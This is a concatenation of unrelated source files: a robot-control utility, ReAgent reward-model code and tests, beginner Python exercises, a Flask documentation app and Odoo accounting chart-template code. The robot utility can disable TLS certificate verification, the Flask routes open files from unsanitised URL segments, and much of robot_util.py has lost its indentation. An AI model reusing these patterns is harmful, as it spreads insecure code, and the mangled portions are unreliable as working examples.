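[serial]
serial_device = /dev/ttyACM0
baud_rate = 9600
""")
print(robot_config.get('serial', 'serial_device'))   # /dev/ttyACM0
print(robot_config.getint('serial', 'baud_rate'))    # 9600
```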
#### File: jjhritz/letsrobot/robot_util.py
```python
import requests
import time
import traceback
import ssl
import sys
import json
import logging
if (sys.version_info > (3, 0)):
import urllib.request as urllib2
from urllib.error import HTTPError
else:
import urllib2
from urllib2 import HTTPError
log = logging.getLogger('robot_util')
terminate=None
def terminate_controller():
log.info('Attempting to terminate controller...')
    if terminate is not None:
terminate.acquire()
# TODO : Think about rewriting this, and using request.
def getWithRetry(url, secure=True):
for retryNumber in range(2000):
try:
log.debug("GET", url)
if secure:
response = urllib2.urlopen(url).read()
else:
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
response = urllib2.urlopen(url, context=ctx).read()
break
except:
log.exception("could not open url", url)
#traceback.print_exc()
time.sleep(2)
return response.decode('utf-8')
server_panels = '[{"button_panels":[{"button_panel_label": "movement controls","buttons": [{"label": "Left", "command": "L"}, {"label": "Right", "command": "R"}, {"label": "Forward", "command": "F"}, {"label": "Backward","command": "B"}]}]}]'
def getAuthToken(url, payload):
headers = {'content-type': 'application/json'}
response = requests.request("POST", url, data=json.dumps(payload), headers=headers)
return response
# This function passes data to the server api to update the robot settings.
def sendRobotSettings(data, robot_id, api_key):
if not api_key == "":
req = urllib2.Request('https://api.letsrobot.tv/api/v1/robots/%s' % robot_id, json.dumps(data).encode('utf-8') )
req.add_header('Authorization', 'Bearer %s' % api_key)
req.add_header('Content-Type', 'application/json')
try:
f = urllib2.urlopen(req)
        except HTTPError:
            #log.debug(api_key)
            log.error("Unable to update robot config on server! check API key")
            return
        response = f.read()
f.close()
log.debug("sendRobotSettings : %s", response)
# This function allows you to set multiple values at once.
def updateRobotSettings(robot_id, api_key, **kwargs ):
data = {}
if (sys.version_info > (3, 0)):
for key, value in kwargs.items():
data[key] = value
else:
for key, value in kwargs.iteritems():
data[key] = value
sendRobotSettings(data, robot_id, api_key)
def setPrivateMode(mode, robot_id, api_key):
data = {}
data['public'] = mode
sendRobotSettings(data, robot_id, api_key)
def setDevMode(mode, robot_id, api_key):
data = {}
data["dev_mode"] = mode
sendRobotSettings(data, robot_id, api_key)
def setAnonControl(mode, robot_id, api_key):
data = {}
data["anonymous_control"] = mode
sendRobotSettings(data, robot_id, api_key)
def setGlobalChat(mode, robot_id, api_key):
data = {}
data["non_global_chat"] = mode
sendRobotSettings(data, robot_id, api_key)
def setWordFilter(mode, robot_id, api_key):
data = {}
data["profanity_filter"] = mode
sendRobotSettings(data, robot_id, api_key)
def setShowExclusive(mode, robot_id, api_key):
data = {}
data["no_exclusive_control_button"] = mode
sendRobotSettings(data, robot_id, api_key)
def setTTSMute(mode, robot_id, api_key):
data = {}
data["mute_text-to-speech"] = mode
sendRobotSettings(data, robot_id, api_key)
def setMicEnabled(mode, robot_id, api_key):
data = {}
data["mic_enabled"] = mode
sendRobotSettings(data, robot_id, api_key)
``` |
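`updateRobotSettings` forwards arbitrary keyword arguments to the settings API. A hypothetical call, assuming a valid robot id and API key:
```python
# hypothetical values; a real robot id and API key come from the letsrobot site
updateRobotSettings(
    "12345678",       # robot_id
    "MY_API_KEY",     # api_key
    public=True,
    dev_mode=False,
    mic_enabled=True,
)
```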
{
"source": "jjhugues/alectryon",
"score": 2
} |
#### File: recipes/tests/alternative_clis.py
```python
import sys
from io import BytesIO, TextIOWrapper
from alectryon import cli, literate
def run(cmd, args, stdin):
sys.argv = ["({})".format(cmd.__name__), "-", *args]
sys.stdin = TextIOWrapper(BytesIO(stdin.encode("utf-8")))
print("== {} ==".format(cmd.__name__))
try:
cmd()
sys.exit(0)
except SystemExit as e:
print("-- exit: {} --\n".format(e.code))
def main():
COQ_INPUT = "Check nat."
REST_INPUT = literate.coq2rst(COQ_INPUT)
run(cli.rstcoq2html, ["--no-header", "--pygments-style=emacs"], COQ_INPUT)
run(cli.coqrst2html, ["--no-header"], REST_INPUT)
run(cli.rstcoq2latex, [], COQ_INPUT)
run(cli.coqrst2latex, [], REST_INPUT)
if __name__ == '__main__':
main()
``` |
{
"source": "j-jiafei/ReAgent",
"score": 2
} |
#### File: prediction/synthetic_reward/single_step_synthetic_reward.py
```python
from typing import Tuple, List
import torch
from reagent.prediction.predictor_wrapper import (
ParametricDqnWithPreprocessor,
ParametricDqnPredictorWrapper,
)
class ParametricSingleStepSyntheticRewardPredictorWrapper(torch.jit.ScriptModule):
def __init__(
self,
synthetic_reward_with_preprocessor: ParametricDqnWithPreprocessor,
) -> None:
super().__init__()
self.wrapper = ParametricDqnPredictorWrapper(synthetic_reward_with_preprocessor)
@torch.jit.script_method
def forward(
self,
state_with_presence: Tuple[torch.Tensor, torch.Tensor],
action_with_presence: Tuple[torch.Tensor, torch.Tensor],
) -> torch.Tensor:
reward = self.wrapper(state_with_presence, action_with_presence)[1]
return reward
```
#### File: reagent/replay_memory/utils.py
```python
import logging
from typing import Dict, List
import numpy as np
import pandas as pd
from reagent.replay_memory.circular_replay_buffer import ReplayBuffer
logger = logging.getLogger(__name__)
DEFAULT_DS = "2019-01-01"
def _dense_to_sparse(dense: np.ndarray) -> List[Dict[str, float]]:
"""Convert dense array to sparse representation"""
assert len(dense.shape) == 2, f"dense shape is {dense.shape}"
# pyre-fixme[7]: Expected `List[Dict[str, float]]` but got `List[Dict[int,
# typing.Any]]`.
return [{i: v.item() for i, v in enumerate(elem)} for elem in dense]
def replay_buffer_to_pre_timeline_df(
is_discrete_action: bool, replay_buffer: ReplayBuffer
) -> pd.DataFrame:
"""Format needed for uploading dataset to Hive, and then run timeline."""
n = replay_buffer.size
batch = replay_buffer.sample_transition_batch(batch_size=n)
# actions is inconsistent between models, so let's infer them.
possible_actions_mask = getattr(batch, "possible_actions_mask", None)
possible_actions = getattr(batch, "possible_actions", None)
terminal = batch.terminal.squeeze(1).tolist()
assert len(batch.action.shape) == 2
if is_discrete_action:
assert (
batch.action.shape[1] == 1
), f"discrete action batch with shape {batch.action.shape}"
# Discrete action space, should be str
action = [str(a.item()) for a in batch.action]
# assuming we've explored the whole action space
unique_actions = np.unique(batch.action)
possible_actions_mask = [
[1 for _ in range(len(unique_actions))] if not elem_terminal else []
for elem_terminal in terminal
]
possible_actions = [
[str(a) for a in unique_actions] if not elem_terminal else []
for elem_terminal in terminal
]
else:
# Box (parametric) action space, should be map<str, double>
action = _dense_to_sparse(batch.action)
# TODO: handle possible actions/mask here
sequence_number = batch.sequence_number.squeeze(1).tolist()
action_probability = np.exp(batch.log_prob.squeeze(1)).tolist()
reward = batch.reward.squeeze(1).tolist()
rows = {
"ds": [DEFAULT_DS for _ in range(n)],
"state_features": _dense_to_sparse(batch.state),
"action": action,
"mdp_id": batch.mdp_id.tolist(),
"sequence_number": sequence_number,
"action_probability": action_probability,
"reward": reward,
"metrics": [{"reward": r} for r in reward],
}
if possible_actions_mask is not None:
rows["possible_actions_mask"] = possible_actions_mask
if possible_actions is not None:
rows["possible_actions"] = possible_actions
return pd.DataFrame.from_dict(rows)
```
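For reference, `_dense_to_sparse` turns each row of a dense feature matrix into a `{feature_index: value}` dict. A tiny standalone example of the same transformation:
```python
import numpy as np

dense = np.array([[0.5, 0.0],
                  [1.5, 2.0]])
# same transformation as _dense_to_sparse above: one {feature_index: value} dict per row
sparse = [{i: v.item() for i, v in enumerate(row)} for row in dense]
print(sparse)  # [{0: 0.5, 1: 0.0}, {0: 1.5, 1: 2.0}]
```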
#### File: test/models/test_synthetic_reward_net.py
```python
import logging
import unittest
import torch
from reagent.models.synthetic_reward import SingleStepSyntheticRewardNet
logger = logging.getLogger(__name__)
class TestSyntheticReward(unittest.TestCase):
def test_single_step_synthetic_reward(self):
state_dim = 10
action_dim = 2
sizes = [256, 128]
activations = ["sigmoid", "relu"]
last_layer_activation = "leaky_relu"
reward_net = SingleStepSyntheticRewardNet(
state_dim=state_dim,
action_dim=action_dim,
sizes=sizes,
activations=activations,
last_layer_activation=last_layer_activation,
)
dnn = reward_net.export_mlp()
# dnn[0] is a concat layer
assert dnn[1].in_features == state_dim + action_dim
assert dnn[1].out_features == 256
assert dnn[2]._get_name() == "Sigmoid"
assert dnn[3].in_features == 256
assert dnn[3].out_features == 128
assert dnn[4]._get_name() == "ReLU"
assert dnn[5].in_features == 128
assert dnn[5].out_features == 1
assert dnn[6]._get_name() == "LeakyReLU"
valid_step = torch.tensor([[1], [2], [3]])
batch_size = 3
seq_len = 4
mask = reward_net.gen_mask(valid_step, batch_size, seq_len)
assert torch.all(
mask
== torch.tensor(
[[0.0, 0.0, 0.0, 1.0], [0.0, 0.0, 1.0, 1.0], [0.0, 1.0, 1.0, 1.0]]
)
)
```
#### File: test/net_builder/test_synthetic_reward_net_builder.py
```python
import unittest
import torch
from reagent.core import types as rlt
from reagent.core.fb_checker import IS_FB_ENVIRONMENT
from reagent.core.parameters import NormalizationData, NormalizationParameters
from reagent.net_builder.synthetic_reward.single_step_synthetic_reward import (
SingleStepSyntheticReward,
)
from reagent.net_builder.unions import SyntheticRewardNetBuilder__Union
from reagent.preprocessing.identify_types import CONTINUOUS
if IS_FB_ENVIRONMENT:
from reagent.fb.prediction.synthetic_reward.single_step_synthetic_reward import (
FbParametricSingleStepSyntheticRewardPredictorWrapper as ParametricSingleStepSyntheticRewardPredictorWrapper,
)
else:
from reagent.prediction.synthetic_reward.single_step_synthetic_reward import (
ParametricSingleStepSyntheticRewardPredictorWrapper,
)
STATE_DIM = 3
ACTION_DIM = 2
BATCH_SIZE = 2
SEQ_LEN = 4
def _create_norm(dim, offset=0):
normalization_data = NormalizationData(
dense_normalization_parameters={
i: NormalizationParameters(feature_type=CONTINUOUS, mean=0.0, stddev=1.0)
for i in range(offset, dim + offset)
}
)
return normalization_data
def _create_input():
state = torch.randn(SEQ_LEN, BATCH_SIZE, STATE_DIM)
valid_step = torch.tensor([[1], [4]])
action = torch.tensor(
[
[[0, 1], [1, 0]],
[[0, 1], [1, 0]],
[[1, 0], [0, 1]],
[[0, 1], [1, 0]],
]
)
input = rlt.MemoryNetworkInput(
state=rlt.FeatureData(state),
action=action,
valid_step=valid_step,
# the rest fields will not be used
next_state=torch.tensor([]),
reward=torch.tensor([]),
step=torch.tensor([]),
not_terminal=torch.tensor([]),
time_diff=torch.tensor([]),
)
return input
class TestSyntheticRewardNetBuilder(unittest.TestCase):
def test_single_step_synthetic_reward_net_builder_discrete_actions(
self,
):
builder = SyntheticRewardNetBuilder__Union(
SingleStepSyntheticReward=SingleStepSyntheticReward()
).value
state_normalization_data = _create_norm(STATE_DIM)
discrete_action_names = ["1", "2"]
reward_net = builder.build_synthetic_reward_network(
state_normalization_data, discrete_action_names=discrete_action_names
)
input = _create_input()
output = reward_net(input).predicted_reward
assert output.shape == (BATCH_SIZE, 1)
# TO IMPLEMENT
# predictor_wrapper = builder.build_serving_module(
# reward_net,
# state_normalization_data,
# discrete_action_names=discrete_action_names,
# )
# self.assertIsInstance(
# predictor_wrapper, DiscreteSingleStepSyntheticRewardPredictorWrapper
# )
def test_single_step_synthetic_reward_net_builder_continuous_actions(
self,
):
builder = SyntheticRewardNetBuilder__Union(
SingleStepSyntheticReward=SingleStepSyntheticReward()
).value
state_normalization_data = _create_norm(STATE_DIM)
action_normalization_data = _create_norm(ACTION_DIM, offset=STATE_DIM)
reward_net = builder.build_synthetic_reward_network(
state_normalization_data,
action_normalization_data=action_normalization_data,
)
input = _create_input()
output = reward_net(input).predicted_reward
assert output.shape == (BATCH_SIZE, 1)
predictor_wrapper = builder.build_serving_module(
reward_net,
state_normalization_data,
action_normalization_data=action_normalization_data,
)
self.assertIsInstance(
predictor_wrapper, ParametricSingleStepSyntheticRewardPredictorWrapper
)
``` |
{
"source": "jjiajian/python-programming-discussion",
"score": 4
} |
#### File: python-programming-discussion/meeting_1/is_this_coding_v2.py
```python
def is_this_coding(activity):
if activity == 'Typing':
print('No! Of course not! ' + activity + ' is not Coding!')
elif activity == 'Programming' or activity == 'Coding':
print(f'Yes! {activity} is Coding!')
else:
print(f'What is that? {activity} == Coding???')
is_this_coding('Typing')
is_this_coding('Programming')
is_this_coding('Coding')
is_this_coding('Cooking')
```
#### File: python-programming-discussion/meeting_2/check_short_circuit.py
```python
def always_true(called):
print(f'always_true is called!!!')
called[0] += 1
return True
def always_false(called):
print(f'always_false is called!!!')
called[0] += 1
return False
def replace_with_func(str):
str = str.replace('T', 'always_true(called)')
str = str.replace('F', 'always_false(called)')
return str
def check_short_circuit(statement):
called = [0]
print(f'Let\'s check {statement}.')
result = eval(replace_with_func(statement))
short_circuited = 'This is short circuited' if (called[0] == 1) else 'Both functions are called'
print(f'{statement} is {result}. {short_circuited}.\n')
check_short_circuit('T or T')
check_short_circuit('T or F')
check_short_circuit('F or T')
check_short_circuit('F or F')
check_short_circuit('T and T')
check_short_circuit('T and F')
check_short_circuit('F and T')
check_short_circuit('F and F')
```
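The same behaviour can be seen without `eval` by probing the operands directly; a minimal sketch:
```python
def probe(name, value):
    print(name, "evaluated")
    return value

# `and` stops at the first falsy operand, `or` stops at the first truthy one
probe("left", False) and probe("right", True)   # prints only "left evaluated"
probe("left", True) or probe("right", False)    # prints only "left evaluated"
```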
#### File: python-programming-discussion/meeting_3/insertion_sort_rewrite.py
```python
list = [21, 5, 22, 20, 12, 3, 11, 5, 13, 16]
def insertion_help(list, ele):
i = 0
    if len(list) == 0:
        list.insert(i, ele)
        return list
    while list[i] < ele:
        i = i + 1
        if i == len(list):
            list.insert(i, ele)
            return list
    list.insert(i, ele)
    return list
def insertion_sort(list):
new_list = []
for i in range(len(list)):
new_list = insertion_help(new_list, list[i])
return new_list
print (list)
print (insertion_sort(list))
``` |
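For comparison, the standard library's `bisect` module gives an equivalent insertion sort in a few lines; a sketch:
```python
import bisect

def insertion_sort_bisect(values):
    out = []
    for v in values:
        bisect.insort(out, v)   # insert v while keeping `out` sorted
    return out

print(insertion_sort_bisect([21, 5, 22, 20, 12, 3, 11, 5, 13, 16]))
# [3, 5, 5, 11, 12, 13, 16, 20, 21, 22]
```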
{
"source": "jjian4/reference",
"score": 2
} |
#### File: reference/reference/views.py
```python
from flask import Flask, Markup, render_template
from os import listdir, path, walk
from reference import app
import re
@app.route('/')
def reference():
commands_path = path.join(app.static_folder, 'commands')
commands = {}
for _, subdirList, _ in walk(commands_path):
# over CATEGORIES
for category in subdirList:
commands[category] = []
# over COMMANDS in category
for filename in sorted(listdir(path.join(commands_path, category))):
filestring = open(path.join(commands_path, category, filename)).read()
filecontents = re.split('\n--+ *\n', filestring, flags=re.MULTILINE)
commands[category].append((path.splitext(filename)[0], filecontents[0], filecontents[1]))
return render_template('reference.html', allFiles=commands)
@app.route('/<category>/<name>')
def command(category, name):
content = open(path.join(app.static_folder, 'commands', category, name + '.md')).read()
return render_template('command.html', name=name, documentation=content)
``` |
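Each command file is split on a line of dashes into a summary and a detail section. A small sketch of the expected file layout and the same split, with hypothetical content:
```python
import re

# hypothetical contents of commands/<category>/ls.md
sample = """List directory contents.
----------------
Use `ls -la` to include hidden files and show permissions, owner and size."""

summary, details = re.split(r'\n--+ *\n', sample, flags=re.MULTILINE)
print(summary)   # short text shown on the index page
print(details)   # full documentation rendered on the command page
```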
{
"source": "JJiao/NiftyPAD",
"score": 3
} |
#### File: niftypad/image_process/regions.py
```python
__author__ = '<NAME>'
__email__ = "<EMAIL>"
import numpy as np
import nibabel as nib
def extract_regional_values(image, parcellation, labels):
idx = labels_to_index(parcellation, labels)
regional_values = np.mean(image[idx, ], axis=0)
return regional_values
def labels_to_index(parcellation, labels):
parcellation = np.squeeze(parcellation)
idx = np.zeros(parcellation.shape, dtype='bool')
for i in range(len(labels)):
idx = np.logical_or(idx, parcellation == labels[i])
return idx
def extract_regional_values_image_file(image_file, parcellation_file):
image = nib.load(image_file)
image_data = image.get_data()
n_frames = 1
if image_data.ndim == 4:
n_frames = image_data.shape[-1]
parcellation_img = nib.load(parcellation_file)
parcellation = parcellation_img.get_data()
regions_label = np.unique(parcellation)
regions_data = np.zeros((regions_label.size, n_frames))
regions_data = np.squeeze(regions_data)
for i in range(regions_label.size):
regions_data[i] = extract_regional_values(image_data, parcellation, [regions_label[i]])
return regions_data, regions_label
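
# Example usage (added comment; the file names are placeholders):
#
#     from niftypad.image_process.regions import extract_regional_values_image_file
#     regions_data, regions_label = extract_regional_values_image_file(
#         'pet_4d.nii.gz', 'parcellation.nii.gz')
#
# regions_data then holds one row per parcellation label, with one column per
# frame for a 4D dynamic image (or a single value per label for a 3D image).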
``` |
{
"source": "jjiege/odoo",
"score": 2
} |
#### File: addons/account/__init__.py
```python
from . import controllers
from . import models
from . import wizard
from . import report
from odoo import api, SUPERUSER_ID
SYSCOHADA_LIST = ['BJ', 'BF', 'CM', 'CF', 'KM', 'CG', 'CI', 'GA', 'GN', 'GW', 'GQ', 'ML', 'NE', 'CD', 'SN', 'TD', 'TG']
def _auto_install_l10n(cr, registry):
#check the country of the main company (only) and eventually load some module needed in that country
env = api.Environment(cr, SUPERUSER_ID, {})
country_code = env.user.company_id.country_id.code
if country_code:
#auto install localization module(s) if available
module_list = []
if country_code in SYSCOHADA_LIST:
#countries using OHADA Chart of Accounts
module_list.append('l10n_syscohada')
elif country_code == 'GB':
module_list.append('l10n_uk')
elif country_code == 'DE':
module_list.append('l10n_de_skr03')
module_list.append('l10n_de_skr04')
elif country_code == 'CN':
module_list.append('l10n_cn_small_business')
module_list.append('l10n_cn_standard')
else:
if env['ir.module.module'].search([('name', '=', 'l10n_' + country_code.lower())]):
module_list.append('l10n_' + country_code.lower())
else:
module_list.append('l10n_generic_coa')
if country_code == 'US':
module_list.append('account_plaid')
module_list.append('l10n_us_check_printing')
if country_code == 'CA':
module_list.append('l10n_ca_check_printing')
if country_code in ['US', 'AU', 'NZ', 'CA', 'CO', 'EC', 'ES', 'FR', 'IN', 'MX', 'UK']:
module_list.append('account_yodlee')
if country_code in SYSCOHADA_LIST + [
'AT', 'BE', 'CA', 'CO', 'DE', 'EC', 'ES', 'ET', 'FR', 'GR', 'IT', 'LU', 'MX', 'NL', 'NO',
'PL', 'PT', 'RO', 'SI', 'TR', 'UK', 'VE', 'VN'
]:
module_list.append('base_vat')
if country_code == 'MX':
module_list.append('l10n_mx_edi')
# European countries will be using SEPA
europe = env.ref('base.europe', raise_if_not_found=False)
if europe:
europe_country_codes = [x.code for x in europe.country_ids]
if country_code in europe_country_codes:
module_list.append('account_sepa')
module_list.append('account_bank_statement_import_camt')
module_ids = env['ir.module.module'].search([('name', 'in', module_list), ('state', '=', 'uninstalled')])
module_ids.sudo().button_install()
```
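A hook such as `_auto_install_l10n` only runs if the module's manifest registers it; below is a trimmed, hypothetical excerpt of that wiring (the real `__manifest__.py` of the account module contains many more keys):
```python
# Hypothetical, trimmed __manifest__.py excerpt; only the hook wiring is shown.
{
    'name': 'Invoicing',
    'post_init_hook': '_auto_install_l10n',
}
```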
#### File: account_lock/models/res_company.py
```python
from odoo import models, api
class ResCompany(models.Model):
_inherit = 'res.company'
@api.multi
def write(self, vals):
# fiscalyear_lock_date can't be set to a prior date
if 'fiscalyear_lock_date' in vals or 'period_lock_date' in vals:
self._check_lock_dates(vals)
return super(ResCompany, self).write(vals)
```
#### File: account/models/chart_template.py
```python
from odoo.exceptions import AccessError
from odoo import api, fields, models, _
from odoo import SUPERUSER_ID
from odoo.exceptions import UserError
from odoo.tools import pycompat
from odoo.http import request
import logging
_logger = logging.getLogger(__name__)
def migrate_set_tags_and_taxes_updatable(cr, registry, module):
''' This is a utility function used to manually set the flag noupdate to False on tags and account tax templates on localization modules
that need migration (for example in case of VAT report improvements)
'''
env = api.Environment(cr, SUPERUSER_ID, {})
xml_record_ids = env['ir.model.data'].search([
('model', 'in', ['account.tax.template', 'account.account.tag']),
('module', 'like', module)
]).ids
if xml_record_ids:
cr.execute("update ir_model_data set noupdate = 'f' where id in %s", (tuple(xml_record_ids),))
def migrate_tags_on_taxes(cr, registry):
    ''' This is a utility function to help migrate the tags of taxes when the localization has been modified on a stable version. If
    called accordingly in a post_init_hook function, it will reset the tags set on taxes as per their equivalent template.
Note: This unusual decision has been made in order to help the improvement of VAT reports on version 9.0, to have them more flexible
and working out of the box when people are creating/using new taxes.
'''
env = api.Environment(cr, SUPERUSER_ID, {})
xml_records = env['ir.model.data'].search([
('model', '=', 'account.tax.template'),
('module', 'like', 'l10n_%')
])
tax_template_ids = [x['res_id'] for x in xml_records.sudo().read(['res_id'])]
for tax_template in env['account.tax.template'].browse(tax_template_ids):
tax_id = env['account.tax'].search([
('name', '=', tax_template.name),
('type_tax_use', '=', tax_template.type_tax_use),
('description', '=', tax_template.description)
])
tax_id.sudo().write({'tag_ids': [(6, 0, tax_template.tag_ids.ids)]})
def preserve_existing_tags_on_taxes(cr, registry, module):
''' This is a utility function used to preserve existing previous tags during upgrade of the module.'''
env = api.Environment(cr, SUPERUSER_ID, {})
xml_records = env['ir.model.data'].search([('model', '=', 'account.account.tag'), ('module', 'like', module)])
if xml_records:
cr.execute("update ir_model_data set noupdate = 't' where id in %s", [tuple(xml_records.ids)])
# ---------------------------------------------------------------
# Account Templates: Account, Tax, Tax Code and chart. + Wizard
# ---------------------------------------------------------------
class AccountAccountTemplate(models.Model):
_name = "account.account.template"
_description = 'Templates for Accounts'
_order = "code"
name = fields.Char(required=True, index=True)
currency_id = fields.Many2one('res.currency', string='Account Currency', help="Forces all moves for this account to have this secondary currency.")
code = fields.Char(size=64, required=True, index=True)
user_type_id = fields.Many2one('account.account.type', string='Type', required=True, oldname='user_type',
help="These types are defined according to your country. The type contains more information "\
"about the account and its specificities.")
reconcile = fields.Boolean(string='Allow Invoices & payments Matching', default=False,
help="Check this option if you want the user to reconcile entries in this account.")
note = fields.Text()
tax_ids = fields.Many2many('account.tax.template', 'account_account_template_tax_rel', 'account_id', 'tax_id', string='Default Taxes')
nocreate = fields.Boolean(string='Optional Create', default=False,
help="If checked, the new chart of accounts will not contain this by default.")
chart_template_id = fields.Many2one('account.chart.template', string='Chart Template',
help="This optional field allow you to link an account template to a specific chart template that may differ from the one its root parent belongs to. This allow you "
"to define chart templates that extend another and complete it with few new accounts (You don't need to define the whole structure that is common to both several times).")
tag_ids = fields.Many2many('account.account.tag', 'account_account_template_account_tag', string='Account tag', help="Optional tags you may want to assign for custom reporting")
group_id = fields.Many2one('account.group')
@api.multi
@api.depends('name', 'code')
def name_get(self):
res = []
for record in self:
name = record.name
if record.code:
name = record.code + ' ' + name
res.append((record.id, name))
return res
class AccountChartTemplate(models.Model):
_name = "account.chart.template"
_description = "Account Chart Template"
name = fields.Char(required=True)
parent_id = fields.Many2one('account.chart.template', string='Parent Chart Template')
code_digits = fields.Integer(string='# of Digits', required=True, default=6, help="No. of Digits to use for account code")
visible = fields.Boolean(string='Can be Visible?', default=True,
help="Set this to False if you don't want this template to be used actively in the wizard that generate Chart of Accounts from "
"templates, this is useful when you want to generate accounts of this template only when loading its child template.")
currency_id = fields.Many2one('res.currency', string='Currency', required=True)
use_anglo_saxon = fields.Boolean(string="Use Anglo-Saxon accounting", default=False)
complete_tax_set = fields.Boolean(string='Complete Set of Taxes', default=True,
help="This boolean helps you to choose if you want to propose to the user to encode the sale and purchase rates or choose from list "
"of taxes. This last choice assumes that the set of tax defined on this template is complete")
account_ids = fields.One2many('account.account.template', 'chart_template_id', string='Associated Account Templates')
tax_template_ids = fields.One2many('account.tax.template', 'chart_template_id', string='Tax Template List',
help='List of all the taxes that have to be installed by the wizard')
bank_account_code_prefix = fields.Char(string='Prefix of the bank accounts', required=True, oldname="bank_account_code_char")
cash_account_code_prefix = fields.Char(string='Prefix of the main cash accounts', required=True)
transfer_account_code_prefix = fields.Char(string='Prefix of the main transfer accounts', required=True)
income_currency_exchange_account_id = fields.Many2one('account.account.template',
string="Gain Exchange Rate Account", domain=[('internal_type', '=', 'other'), ('deprecated', '=', False)])
expense_currency_exchange_account_id = fields.Many2one('account.account.template',
string="Loss Exchange Rate Account", domain=[('internal_type', '=', 'other'), ('deprecated', '=', False)])
property_account_receivable_id = fields.Many2one('account.account.template', string='Receivable Account', oldname="property_account_receivable")
property_account_payable_id = fields.Many2one('account.account.template', string='Payable Account', oldname="property_account_payable")
property_account_expense_categ_id = fields.Many2one('account.account.template', string='Category of Expense Account', oldname="property_account_expense_categ")
property_account_income_categ_id = fields.Many2one('account.account.template', string='Category of Income Account', oldname="property_account_income_categ")
property_account_expense_id = fields.Many2one('account.account.template', string='Expense Account on Product Template', oldname="property_account_expense")
property_account_income_id = fields.Many2one('account.account.template', string='Income Account on Product Template', oldname="property_account_income")
property_stock_account_input_categ_id = fields.Many2one('account.account.template', string="Input Account for Stock Valuation", oldname="property_stock_account_input_categ")
property_stock_account_output_categ_id = fields.Many2one('account.account.template', string="Output Account for Stock Valuation", oldname="property_stock_account_output_categ")
property_stock_valuation_account_id = fields.Many2one('account.account.template', string="Account Template for Stock Valuation")
@api.model
def _prepare_transfer_account_template(self):
''' Prepare values to create the transfer account that is an intermediary account used when moving money
from a liquidity account to another.
:return: A dictionary of values to create a new account.account.
'''
digits = self.code_digits
prefix = self.transfer_account_code_prefix or ''
# Flatten the hierarchy of chart templates.
chart_template = self
chart_templates = self
while chart_template.parent_id:
chart_templates += chart_template.parent_id
chart_template = chart_template.parent_id
new_code = ''
for num in range(1, 100):
new_code = str(prefix.ljust(digits - 1, '0')) + str(num)
rec = self.env['account.account.template'].search(
[('code', '=', new_code), ('chart_template_id', 'in', chart_templates.ids)], limit=1)
if not rec:
break
else:
raise UserError(_('Cannot generate an unused account code.'))
current_assets_type = self.env.ref('account.data_account_type_current_assets', raise_if_not_found=False)
return {
'name': _('Liquidity Transfer'),
'code': new_code,
'user_type_id': current_assets_type and current_assets_type.id or False,
'reconcile': True,
'chart_template_id': self.id,
}
@api.one
def try_loading_for_current_company(self):
""" Installs this chart of accounts for the current company if not chart
of accounts had been created for it yet.
"""
self.ensure_one()
# do not use `request.env` here, it can cause deadlocks
if request and request.session.uid:
current_user = self.env['res.users'].browse(request.uid)
company = current_user.company_id
else:
# fallback to company of current user, most likely __system__
# (won't work well for multi-company)
company = self.env.user.company_id
# If we don't have any chart of account on this company, install this chart of account
if not company.chart_template_id and not self.existing_accounting(company):
self.load_for_current_company(15.0, 15.0)
def load_for_current_company(self, sale_tax_rate, purchase_tax_rate):
""" Installs this chart of accounts on the current company, replacing
        the existing one if it already had one defined. If some accounting entries
had already been made, this function fails instead, triggering a UserError.
Also, note that this function can only be run by someone with administration
rights.
"""
self.ensure_one()
# do not use `request.env` here, it can cause deadlocks
if request and request.session.uid:
current_user = self.env['res.users'].browse(request.uid)
company = current_user.company_id
else:
# fallback to company of current user, most likely __system__
# (won't work well for multi-company)
company = self.env.user.company_id
# Ensure everything is translated to the company's language, not the user's one.
self = self.with_context(lang=company.partner_id.lang)
if not self.env.user._is_admin():
raise AccessError(_("Only administrators can load a charf of accounts"))
existing_accounts = self.env['account.account'].search([('company_id', '=', company.id)])
if existing_accounts:
# we tolerate switching from accounting package (localization module) as long as there isn't yet any accounting
# entries created for the company.
if self.existing_accounting(company):
raise UserError(_('Could not install new chart of account as there are already accounting entries existing.'))
# delete accounting properties
prop_values = ['account.account,%s' % (account_id,) for account_id in existing_accounts.ids]
existing_journals = self.env['account.journal'].search([('company_id', '=', company.id)])
if existing_journals:
prop_values.extend(['account.journal,%s' % (journal_id,) for journal_id in existing_journals.ids])
accounting_props = self.env['ir.property'].search([('value_reference', 'in', prop_values)])
if accounting_props:
accounting_props.sudo().unlink()
# delete account, journal, tax, fiscal position and reconciliation model
models_to_delete = ['account.reconcile.model', 'account.fiscal.position', 'account.tax', 'account.move', 'account.journal']
for model in models_to_delete:
res = self.env[model].search([('company_id', '=', company.id)])
if len(res):
res.unlink()
existing_accounts.unlink()
company.write({'currency_id': self.currency_id.id,
'anglo_saxon_accounting': self.use_anglo_saxon,
'bank_account_code_prefix': self.bank_account_code_prefix,
'cash_account_code_prefix': self.cash_account_code_prefix,
'transfer_account_code_prefix': self.transfer_account_code_prefix,
'chart_template_id': self.id
})
#set the coa currency to active
self.currency_id.write({'active': True})
# When we install the CoA of first company, set the currency to price types and pricelists
if company.id == 1:
for reference in ['product.list_price', 'product.standard_price', 'product.list0']:
try:
tmp2 = self.env.ref(reference).write({'currency_id': self.currency_id.id})
except ValueError:
pass
# If the floats for sale/purchase rates have been filled, create templates from them
self._create_tax_templates_from_rates(company.id, sale_tax_rate, purchase_tax_rate)
# Install all the templates objects and generate the real objects
acc_template_ref, taxes_ref = self._install_template(company, code_digits=self.code_digits)
# Set the transfer account on the company
company.transfer_account_id = self.env['account.account'].search([('code', '=like', self.transfer_account_code_prefix + '%')])[:1]
# Create Bank journals
self._create_bank_journals(company, acc_template_ref)
# Create the current year earning account if it wasn't present in the CoA
company.get_unaffected_earnings_account()
# set the default taxes on the company
company.account_sale_tax_id = self.env['account.tax'].search([('type_tax_use', 'in', ('sale', 'all')), ('company_id', '=', company.id)], limit=1).id
company.account_purchase_tax_id = self.env['account.tax'].search([('type_tax_use', 'in', ('purchase', 'all')), ('company_id', '=', company.id)], limit=1).id
return {}
@api.model
def existing_accounting(self, company_id):
""" Returns True iff some accounting entries have already been made for
the provided company (meaning hence that its chart of accounts cannot
be changed anymore).
"""
model_to_check = ['account.move.line', 'account.invoice', 'account.payment', 'account.bank.statement']
for model in model_to_check:
if self.env[model].sudo().search([('company_id', '=', company_id.id)], limit=1):
return True
return False
def _create_tax_templates_from_rates(self, company_id, sale_tax_rate, purchase_tax_rate):
'''
This function checks if this chart template is configured as containing a full set of taxes, and if
        it's not the case, it creates the templates for the account.tax object according to the provided sale/purchase rates.
